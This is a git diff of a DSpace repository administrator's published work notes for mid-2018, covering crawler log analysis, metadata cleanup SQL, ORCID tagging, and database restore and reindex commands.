    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "Pcore-HTTP" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
       17098 208.110.72.10
    -# grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=208.110.72.10' dspace.log.2018-07-11
    +# grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=208.110.72.10' dspace.log.2018-07-11
     1161
    -# grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=208.110.72.10' dspace.log.2018-07-12
    +# grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=208.110.72.10' dspace.log.2018-07-12
     1885
     
    • I think the problem is that, despite the bot requesting robots.txt, it almost exlusively requests dynamic pages from /discover:
    -
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "Pcore-HTTP" | grep -o -E "GET /(browse|discover|search-filter)" | sort -n | uniq -c | sort -rn
    +
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "Pcore-HTTP" | grep -o -E "GET /(browse|discover|search-filter)" | sort -n | uniq -c | sort -rn
       13364 GET /discover
         993 GET /search-filter
         804 GET /browse
    -# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "Pcore-HTTP" | grep robots
    -208.110.72.10 - - [12/Jul/2018:00:22:28 +0000] "GET /robots.txt HTTP/1.1" 200 1301 "https://cgspace.cgiar.org/robots.txt" "Pcore-HTTP/v0.44.0"
    +# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "Pcore-HTTP" | grep robots
    +208.110.72.10 - - [12/Jul/2018:00:22:28 +0000] "GET /robots.txt HTTP/1.1" 200 1301 "https://cgspace.cgiar.org/robots.txt" "Pcore-HTTP/v0.44.0"
     
    • So this bot is just like Baiduspider, and I need to add it to the nginx rate limiting
    • I’ll also add it to Tomcat’s Crawler Session Manager Valve to force the re-use of a common Tomcat sesssion for all crawlers just in case
    • @@ -408,7 +408,7 @@ $ csvcut -c 1 < /tmp/affiliations.csv > /tmp/affiliations-1.csv
      • Generate a list of affiliations for Peter and Abenet to go over so we can batch correct them before we deploy the new data visualization dashboard:
      -
      dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'affiliation') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/affiliations.csv with csv header;
      +
      dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'affiliation') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/affiliations.csv with csv header;
       COPY 4518
       

      2018-07-15

        @@ -438,14 +438,14 @@ OAI 2.0 manager action ended. It took 697 seconds.
      • I need to ask the dspace-tech mailing list if the nightly OAI import catches the case of old items that have had metadata or mappings change
      • ICARDA sent me a list of the ORCID iDs they have in the MEL system and it looks like almost 150 are new and unique to us!
      -
      $ cat dspace/config/controlled-vocabularies/cg-creator-id.xml | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq | wc -l
      +
      $ cat dspace/config/controlled-vocabularies/cg-creator-id.xml | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq | wc -l
       1020
      -$ cat dspace/config/controlled-vocabularies/cg-creator-id.xml MEL\ ORCID.json | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq | wc -l
      +$ cat dspace/config/controlled-vocabularies/cg-creator-id.xml MEL\ ORCID.json | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq | wc -l
       1158
       
      • I combined the two lists and regenerated the names for all our the ORCID iDs using my resolve-orcids.py script:
      -
      $ cat dspace/config/controlled-vocabularies/cg-creator-id.xml MEL\ ORCID.json | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq > /tmp/2018-07-15-orcid-ids.txt
      +
      $ cat dspace/config/controlled-vocabularies/cg-creator-id.xml MEL\ ORCID.json | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq > /tmp/2018-07-15-orcid-ids.txt
       $ ./resolve-orcids.py -i /tmp/2018-07-15-orcid-ids.txt -o /tmp/2018-07-15-resolved-orcids.txt -d
       
      • Then I added the XML formatting for controlled vocabularies, sorted the list with GNU sort in vim via % !sort and then checked the formatting with tidy:
      • @@ -465,16 +465,16 @@ $ ./resolve-orcids.py -i /tmp/2018-07-15-orcid-ids.txt -o /tmp/2018-07-15-resolv
      • For every day in the past week I only see about 50 to 100 requests per day, but then about nine days ago I see 1500 requsts
      • In there I see two bots making about 750 requests each, and this one is probably Altmetric:
      -
      178.33.237.157 - - [09/Jul/2018:17:00:46 +0000] "GET /oai/request?verb=ListRecords&resumptionToken=oai_dc////100 HTTP/1.1" 200 58653 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_121)"
      -178.33.237.157 - - [09/Jul/2018:17:01:11 +0000] "GET /oai/request?verb=ListRecords&resumptionToken=oai_dc////200 HTTP/1.1" 200 67950 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_121)"
      +
      178.33.237.157 - - [09/Jul/2018:17:00:46 +0000] "GET /oai/request?verb=ListRecords&resumptionToken=oai_dc////100 HTTP/1.1" 200 58653 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_121)"
      +178.33.237.157 - - [09/Jul/2018:17:01:11 +0000] "GET /oai/request?verb=ListRecords&resumptionToken=oai_dc////200 HTTP/1.1" 200 67950 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_121)"
       ...
      -178.33.237.157 - - [09/Jul/2018:22:10:39 +0000] "GET /oai/request?verb=ListRecords&resumptionToken=oai_dc////73900 HTTP/1.1" 20 0 25049 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_121)"
      +178.33.237.157 - - [09/Jul/2018:22:10:39 +0000] "GET /oai/request?verb=ListRecords&resumptionToken=oai_dc////73900 HTTP/1.1" 20 0 25049 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_121)"
       
      • So if they are getting 100 records per OAI request it would take them 739 requests
      • I wonder if I should add this user agent to the Tomcat Crawler Session Manager valve… does OAI use Tomcat sessions?
      • Appears not:
      -
      $ http --print Hh 'https://cgspace.cgiar.org/oai/request?verb=ListRecords&resumptionToken=oai_dc////100'
      +
      $ http --print Hh 'https://cgspace.cgiar.org/oai/request?verb=ListRecords&resumptionToken=oai_dc////100'
       GET /oai/request?verb=ListRecords&resumptionToken=oai_dc////100 HTTP/1.1
       Accept: */*
       Accept-Encoding: gzip, deflate
      @@ -523,17 +523,17 @@ X-XSS-Protection: 1; mode=block
       
    • Still discussing dates with IWMI
    • I looked in the database to see the breakdown of date formats used in dc.date.issued, ie YYYY, YYYY-MM, or YYYY-MM-DD:
    -
    dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=15 and text_value ~ '^[0-9]{4}$';
    +
    dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=15 and text_value ~ '^[0-9]{4}$';
      count
     -------
      53292
     (1 row)
    -dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=15 and text_value ~ '^[0-9]{4}-[0-9]{2}$';
    +dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=15 and text_value ~ '^[0-9]{4}-[0-9]{2}$';
      count
     -------
       3818
     (1 row)
    -dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=15 and text_value ~ '^[0-9]{4}-[0-9]{2}-[0-9]{2}$';
    +dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=15 and text_value ~ '^[0-9]{4}-[0-9]{2}-[0-9]{2}$';
      count
     -------
      17357
    diff --git a/docs/2018-08/index.html b/docs/2018-08/index.html
    index 63ad7efdd..a809b7242 100644
    --- a/docs/2018-08/index.html
    +++ b/docs/2018-08/index.html
    @@ -46,7 +46,7 @@ Anyways, perhaps I should increase the JVM heap from 5120m to 6144m like we did
     The server only has 8GB of RAM so we’ll eventually need to upgrade to a larger one because we’ll start starving the OS, PostgreSQL, and command line batch processes
     I ran all system updates on DSpace Test and rebooted it
     "/>
    -
    +
     
     
         
    @@ -179,13 +179,13 @@ I ran all system updates on DSpace Test and rebooted it
     
  • I did some quick sanity checks and small cleanups in Open Refine, checking for spaces, weird accents, and encoding errors
  • Finally I did a test run with the fix-metadata-value.py script:
  • -
    $ ./fix-metadata-values.py -i 2018-08-15-Correct-1083-Affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -t correct -m 211
    -$ ./delete-metadata-values.py -i 2018-08-15-Remove-11-Affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -m 211
    +
    $ ./fix-metadata-values.py -i 2018-08-15-Correct-1083-Affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -t correct -m 211
    +$ ./delete-metadata-values.py -i 2018-08-15-Remove-11-Affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -m 211
     

    2018-08-16

    • Generate a list of the top 1,500 authors on CGSpace for Sisay so he can create the controlled vocabulary:
    -
    dspace=# \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc limit 1500) to /tmp/2018-08-16-top-1500-authors.csv with csv; 
    +
    dspace=# \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc limit 1500) to /tmp/2018-08-16-top-1500-authors.csv with csv; 
     
    • Start working on adding the ORCID metadata to a handful of CIAT authors as requested by Elizabeth earlier this month
    • I might need to overhaul the add-orcid-identifiers-csv.py script to be a little more robust about author order and ORCID metadata that might have been altered manually by editors after submission, as this script was written without that consideration
    • @@ -198,14 +198,14 @@ $ ./delete-metadata-values.py -i 2018-08-15-Remove-11-Affiliations.csv -db dspac
      $ sudo docker run --name dspacedb -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:9.6-alpine
       $ createuser -h localhost -U postgres --pwprompt dspacetest
       $ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspacetest
      -$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest superuser;'
      +$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest superuser;'
       $ pg_restore -h localhost -U postgres -d dspacetest -O --role=dspacetest ~/Downloads/cgspace_2018-08-16.backup
      -$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser;'
      +$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser;'
       $ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspacetest
       

      2018-08-19

      • Keep working on the CIAT ORCID identifiers from Elizabeth
      • -
      • In the spreadsheet she sent me there are some names with other versions in the database, so when it is obviously the same one (ie “Schultze-Kraft, Rainer” and “Schultze-Kraft, R.") I will just tag them with ORCID identifiers too
      • +
      • In the spreadsheet she sent me there are some names with other versions in the database, so when it is obviously the same one (ie “Schultze-Kraft, Rainer” and “Schultze-Kraft, R.”) I will just tag them with ORCID identifiers too
      • This is less obvious and more error prone with names like “Peters” where there are many more authors
      • I see some errors in the variations of names as well, for example:
      @@ -221,37 +221,37 @@ Verchot, Louis V.
    • In the end, I’ll run the following CSV with my add-orcid-identifiers-csv.py script:
    dc.contributor.author,cg.creator.id
    -"Campbell, Bruce",Bruce M Campbell: 0000-0002-0123-4859
    -"Campbell, Bruce M.",Bruce M Campbell: 0000-0002-0123-4859
    -"Campbell, B.M",Bruce M Campbell: 0000-0002-0123-4859
    -"Peters, Michael",Michael Peters: 0000-0003-4237-3916
    -"Peters, M.",Michael Peters: 0000-0003-4237-3916
    -"Peters, M.K.",Michael Peters: 0000-0003-4237-3916
    -"Tamene, Lulseged",Lulseged Tamene: 0000-0002-3806-8890
    -"Desta, Lulseged Tamene",Lulseged Tamene: 0000-0002-3806-8890
    -"Läderach, Peter",Peter Läderach: 0000-0001-8708-6318
    -"Lundy, Mark",Mark Lundy: 0000-0002-5241-3777
    -"Schultze-Kraft, Rainer",Rainer Schultze-Kraft: 0000-0002-4563-0044
    -"Schultze-Kraft, R.",Rainer Schultze-Kraft: 0000-0002-4563-0044
    -"Verchot, Louis",Louis Verchot: 0000-0001-8309-6754
    -"Verchot, L",Louis Verchot: 0000-0001-8309-6754
    -"Verchot, L. V.",Louis Verchot: 0000-0001-8309-6754
    -"Verchot, L.V",Louis Verchot: 0000-0001-8309-6754
    -"Verchot, L.V.",Louis Verchot: 0000-0001-8309-6754
    -"Verchot, LV",Louis Verchot: 0000-0001-8309-6754
    -"Verchot, Louis V.",Louis Verchot: 0000-0001-8309-6754
    -"Mukankusi, Clare",Clare Mukankusi: 0000-0001-7837-4545
    -"Mukankusi, Clare M.",Clare Mukankusi: 0000-0001-7837-4545
    -"Wyckhuys, Kris",Kris Wyckhuys: 0000-0003-0922-488X
    -"Wyckhuys, Kris A. G.",Kris Wyckhuys: 0000-0003-0922-488X
    -"Wyckhuys, Kris A.G.",Kris Wyckhuys: 0000-0003-0922-488X
    -"Chirinda, Ngonidzashe",Ngonidzashe Chirinda: 0000-0002-4213-6294
    -"Chirinda, Ngoni",Ngonidzashe Chirinda: 0000-0002-4213-6294
    -"Ngonidzashe, Chirinda",Ngonidzashe Chirinda: 0000-0002-4213-6294
    +"Campbell, Bruce",Bruce M Campbell: 0000-0002-0123-4859
    +"Campbell, Bruce M.",Bruce M Campbell: 0000-0002-0123-4859
    +"Campbell, B.M",Bruce M Campbell: 0000-0002-0123-4859
    +"Peters, Michael",Michael Peters: 0000-0003-4237-3916
    +"Peters, M.",Michael Peters: 0000-0003-4237-3916
    +"Peters, M.K.",Michael Peters: 0000-0003-4237-3916
    +"Tamene, Lulseged",Lulseged Tamene: 0000-0002-3806-8890
    +"Desta, Lulseged Tamene",Lulseged Tamene: 0000-0002-3806-8890
    +"Läderach, Peter",Peter Läderach: 0000-0001-8708-6318
    +"Lundy, Mark",Mark Lundy: 0000-0002-5241-3777
    +"Schultze-Kraft, Rainer",Rainer Schultze-Kraft: 0000-0002-4563-0044
    +"Schultze-Kraft, R.",Rainer Schultze-Kraft: 0000-0002-4563-0044
    +"Verchot, Louis",Louis Verchot: 0000-0001-8309-6754
    +"Verchot, L",Louis Verchot: 0000-0001-8309-6754
    +"Verchot, L. V.",Louis Verchot: 0000-0001-8309-6754
    +"Verchot, L.V",Louis Verchot: 0000-0001-8309-6754
    +"Verchot, L.V.",Louis Verchot: 0000-0001-8309-6754
    +"Verchot, LV",Louis Verchot: 0000-0001-8309-6754
    +"Verchot, Louis V.",Louis Verchot: 0000-0001-8309-6754
    +"Mukankusi, Clare",Clare Mukankusi: 0000-0001-7837-4545
    +"Mukankusi, Clare M.",Clare Mukankusi: 0000-0001-7837-4545
    +"Wyckhuys, Kris",Kris Wyckhuys: 0000-0003-0922-488X
    +"Wyckhuys, Kris A. G.",Kris Wyckhuys: 0000-0003-0922-488X
    +"Wyckhuys, Kris A.G.",Kris Wyckhuys: 0000-0003-0922-488X
    +"Chirinda, Ngonidzashe",Ngonidzashe Chirinda: 0000-0002-4213-6294
    +"Chirinda, Ngoni",Ngonidzashe Chirinda: 0000-0002-4213-6294
    +"Ngonidzashe, Chirinda",Ngonidzashe Chirinda: 0000-0002-4213-6294
     
    • The invocation would be:
    -
    $ ./add-orcid-identifiers-csv.py -i 2018-08-16-ciat-orcid.csv -db dspace -u dspace -p 'fuuu'
    +
    $ ./add-orcid-identifiers-csv.py -i 2018-08-16-ciat-orcid.csv -db dspace -u dspace -p 'fuuu'
     
    • I ran the script on DSpace Test and CGSpace and tagged a total of 986 ORCID identifiers
    • Looking at the list of author affialitions from Peter one last time
    • @@ -268,12 +268,12 @@ Verchot, Louis V.
    • This character all by itself is indicative of encoding issues in French, Italian, and Spanish names, for example: De´veloppement and Investigacio´n
    • I will run the following on DSpace Test and CGSpace:
    -
    $ ./fix-metadata-values.py -i /tmp/2018-08-15-Correct-1083-Affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -t correct -m 211
    -$ ./delete-metadata-values.py -i /tmp/2018-08-15-Remove-11-Affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -m 211
    +
    $ ./fix-metadata-values.py -i /tmp/2018-08-15-Correct-1083-Affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -t correct -m 211
    +$ ./delete-metadata-values.py -i /tmp/2018-08-15-Remove-11-Affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -m 211
     
    • Then force an update of the Discovery index on DSpace Test:
    -
    $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx512m"
    +
    $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx512m"
     $ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
     
     real    72m12.570s
    @@ -282,7 +282,7 @@ sys     2m2.461s
     
    • And then on CGSpace:
    -
    $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1024m"
    +
    $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1024m"
     $ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
     
     real    79m44.392s
    @@ -292,9 +292,9 @@ sys     2m20.248s
     
  • Run system updates on DSpace Test and reboot the server
  • In unrelated news, I see some newish Russian bot making a few thousand requests per day and not re-using its XMLUI session:
  • -
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep '19/Aug/2018' | grep -c 5.9.6.51
    +
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep '19/Aug/2018' | grep -c 5.9.6.51
     1553
    -# grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=5.9.6.51' dspace.log.2018-08-19
    +# grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=5.9.6.51' dspace.log.2018-08-19
     1724
     
    • I don’t even know how its possible for the bot to use MORE sessions than total requests…
    • @@ -391,11 +391,11 @@ $ dspace database migrate ignored
    • I exported a list of items from Listings and Reports with the following criteria: from year 2013 until now, have WLE subject GENDER or GENDER POVERTY AND INSTITUTIONS, and CRP Water, Land and Ecosystems
    • Then I extracted the Handle links from the report so I could export each item’s metadata as CSV
    -
    $ grep -o -E "[0-9]{5}/[0-9]{0,5}" listings-export.txt > /tmp/iwmi-gender-items.txt
    +
    $ grep -o -E "[0-9]{5}/[0-9]{0,5}" listings-export.txt > /tmp/iwmi-gender-items.txt
     
    • Then on the DSpace server I exported the metadata for each item one by one:
    -
    $ while read -r line; do dspace metadata-export -f "/tmp/${line/\//-}.csv" -i $line; sleep 2; done < /tmp/iwmi-gender-items.txt
    +
    $ while read -r line; do dspace metadata-export -f "/tmp/${line/\//-}.csv" -i $line; sleep 2; done < /tmp/iwmi-gender-items.txt
     
    • But from here I realized that each of the fifty-nine items will have different columns in their CSVs, making it difficult to combine them
    • I’m not sure how to proceed without writing some script to parse and join the CSVs, and I don’t think it’s worth my time
    • diff --git a/docs/2018-09/index.html b/docs/2018-09/index.html index ddeae4917..a0aedf728 100644 --- a/docs/2018-09/index.html +++ b/docs/2018-09/index.html @@ -30,7 +30,7 @@ I’ll update the DSpace role in our Ansible infrastructure playbooks and ru Also, I’ll re-run the postgresql tasks because the custom PostgreSQL variables are dynamic according to the system’s RAM, and we never re-ran them after migrating to larger Linodes last month I’m testing the new DSpace 5.8 branch in my Ubuntu 18.04 environment and I’m getting those autowire errors in Tomcat 8.5.30 again: "/> - + @@ -124,7 +124,7 @@ I’m testing the new DSpace 5.8 branch in my Ubuntu 18.04 environment and I
    • I’m testing the new DSpace 5.8 branch in my Ubuntu 18.04 environment and I’m getting those autowire errors in Tomcat 8.5.30 again:
    02-Sep-2018 11:18:52.678 SEVERE [localhost-startStop-1] org.apache.catalina.core.StandardContext.listenerStart Exception sending context initialized event to listener instance of class [org.dspace.servicemanager.servlet.DSpaceKernelServletContextListener]
    - java.lang.RuntimeException: Failure during filter init: Failed to startup the DSpace Service Manager: failure starting up spring service manager: Error creating bean with name 'conversionService' defined in file [/home/dspacetest.cgiar.org/config/spring/xmlui/spring-dspace-addon-cua-services.xml]: Cannot create inner bean 'com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#4c5d5a2' of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter] while setting bean property 'converters' with key [1]; nested exception is org.springframework.beans.factory.BeanCreationException: Error creating bean with name 'com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#4c5d5a2': Injection of autowired dependencies failed; nested exception is org.springframework.beans.factory.BeanCreationException: Could not autowire field: private com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter.filterConverter; nested exception is org.springframework.beans.factory.NoSuchBeanDefinitionException: No matching bean of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter] found for dependency: expected at least 1 bean which qualifies as autowire candidate for this dependency. Dependency annotations: {@org.springframework.beans.factory.annotation.Autowired(required=true)}
    + java.lang.RuntimeException: Failure during filter init: Failed to startup the DSpace Service Manager: failure starting up spring service manager: Error creating bean with name 'conversionService' defined in file [/home/dspacetest.cgiar.org/config/spring/xmlui/spring-dspace-addon-cua-services.xml]: Cannot create inner bean 'com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#4c5d5a2' of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter] while setting bean property 'converters' with key [1]; nested exception is org.springframework.beans.factory.BeanCreationException: Error creating bean with name 'com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#4c5d5a2': Injection of autowired dependencies failed; nested exception is org.springframework.beans.factory.BeanCreationException: Could not autowire field: private com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter.filterConverter; nested exception is org.springframework.beans.factory.NoSuchBeanDefinitionException: No matching bean of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter] found for dependency: expected at least 1 bean which qualifies as autowire candidate for this dependency. Dependency annotations: {@org.springframework.beans.factory.annotation.Autowired(required=true)}
         at org.dspace.servicemanager.servlet.DSpaceKernelServletContextListener.contextInitialized(DSpaceKernelServletContextListener.java:92)
         at org.apache.catalina.core.StandardContext.listenerStart(StandardContext.java:4776)
         at org.apache.catalina.core.StandardContext.startInternal(StandardContext.java:5240)
    @@ -139,7 +139,7 @@ I’m testing the new DSpace 5.8 branch in my Ubuntu 18.04 environment and I
         at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
         at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
         at java.lang.Thread.run(Thread.java:748)
    -Caused by: java.lang.RuntimeException: Failed to startup the DSpace Service Manager: failure starting up spring service manager: Error creating bean with name 'conversionService' defined in file [/home/dspacetest.cgiar.org/config/spring/xmlui/spring-dspace-addon-cua-services.xml]: Cannot create inner bean 'com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#4c5d5a2' of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter] while setting bean property 'converters' with key [1]; nested exception is org.springframework.beans.factory.BeanCreationException: Error creating bean with name 'com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#4c5d5a2': Injection of autowired dependencies failed; nested exception is org.springframework.beans.factory.BeanCreationException: Could not autowire field: private com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter.filterConverter; nested exception is org.springframework.beans.factory.NoSuchBeanDefinitionException: No matching bean of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter] found for dependency: expected at least 1 bean which qualifies as autowire candidate for this dependency. Dependency annotations:
    +Caused by: java.lang.RuntimeException: Failed to startup the DSpace Service Manager: failure starting up spring service manager: Error creating bean with name 'conversionService' defined in file [/home/dspacetest.cgiar.org/config/spring/xmlui/spring-dspace-addon-cua-services.xml]: Cannot create inner bean 'com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#4c5d5a2' of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter] while setting bean property 'converters' with key [1]; nested exception is org.springframework.beans.factory.BeanCreationException: Error creating bean with name 'com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#4c5d5a2': Injection of autowired dependencies failed; nested exception is org.springframework.beans.factory.BeanCreationException: Could not autowire field: private com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter.filterConverter; nested exception is org.springframework.beans.factory.NoSuchBeanDefinitionException: No matching bean of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter] found for dependency: expected at least 1 bean which qualifies as autowire candidate for this dependency. Dependency annotations:
     
    • Full log here: https://gist.github.com/alanorth/1e4ae567b853fea9d9dbf1a030ecd8c2
    • XMLUI fails to load, but the REST, SOLR, JSPUI, etc work
    • @@ -191,13 +191,13 @@ requests: method: GET url: https://dspacetest.cgiar.org/rest/test validate: - raw: "REST api is running." + raw: "REST api is running." login: url: https://dspacetest.cgiar.org/rest/login method: POST data: - json: {"email":"test@dspace","password":"thepass"} + json: {"email":"test@dspace","password":"thepass"} status: url: https://dspacetest.cgiar.org/rest/status @@ -229,15 +229,15 @@ $ dspace community-filiator --set -p 10568/97114 -c 10568/3112
    • Valerio contacted me to point out some issues with metadata on CGSpace, which I corrected in PostgreSQL:
    -
    update metadatavalue set text_value='ISI Journal' where resource_type_id=2 and metadata_field_id=226 and text_value='ISI Juornal';
    +
    update metadatavalue set text_value='ISI Journal' where resource_type_id=2 and metadata_field_id=226 and text_value='ISI Juornal';
     UPDATE 1
    -update metadatavalue set text_value='ISI Journal' where resource_type_id=2 and metadata_field_id=226 and text_value='ISI journal';
    +update metadatavalue set text_value='ISI Journal' where resource_type_id=2 and metadata_field_id=226 and text_value='ISI journal';
     UPDATE 23
    -update metadatavalue set text_value='ISI Journal' where resource_type_id=2 and metadata_field_id=226 and text_value='YES';
    +update metadatavalue set text_value='ISI Journal' where resource_type_id=2 and metadata_field_id=226 and text_value='YES';
     UPDATE 1
    -delete from metadatavalue where resource_type_id=2 and metadata_field_id=226 and text_value='NO';
    +delete from metadatavalue where resource_type_id=2 and metadata_field_id=226 and text_value='NO';
     DELETE 17
    -update metadatavalue set text_value='ISI Journal' where resource_type_id=2 and metadata_field_id=226 and text_value='ISI';
    +update metadatavalue set text_value='ISI Journal' where resource_type_id=2 and metadata_field_id=226 and text_value='ISI';
     UPDATE 15
     
    • Start working on adding metadata for access and usage rights that we started earlier in 2018 (and also in 2017)
    • @@ -246,7 +246,7 @@ UPDATE 15
    • Linode said that CGSpace (linode18) had a high CPU load earlier today
    • When I looked, I see it’s the same Russian IP that I noticed last month:
    -
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "10/Sep/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "10/Sep/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
        1459 157.55.39.202
        1579 95.108.181.88
        1615 157.55.39.147
    @@ -260,7 +260,7 @@ UPDATE 15
     
    • And this bot is still creating more Tomcat sessions than Nginx requests (WTF?):
    -
    # grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=5.9.6.51' dspace.log.2018-09-10 
    +
    # grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=5.9.6.51' dspace.log.2018-09-10 
     14133
     
    • The user agent is still the same:
    • @@ -270,7 +270,7 @@ UPDATE 15
    • I added .*crawl.* to the Tomcat Session Crawler Manager Valve, so I’m not sure why the bot is creating so many sessions…
    • I just tested that user agent on CGSpace and it does not create a new session:
    -
    $ http --print Hh https://cgspace.cgiar.org 'User-Agent:Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)'
    +
    $ http --print Hh https://cgspace.cgiar.org 'User-Agent:Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)'
     GET / HTTP/1.1
     Accept: */*
     Accept-Encoding: gzip, deflate
    @@ -319,7 +319,7 @@ $ sudo docker run --name dspacedb -v dspacetest_data:/var/lib/postgresql/data -e
     
  • Linode says that CGSpace (linode18) has had high CPU for the past two hours
  • The top IP addresses today are:
  • -
    # zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep -E "13/Sep/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10                                                                                                
    +
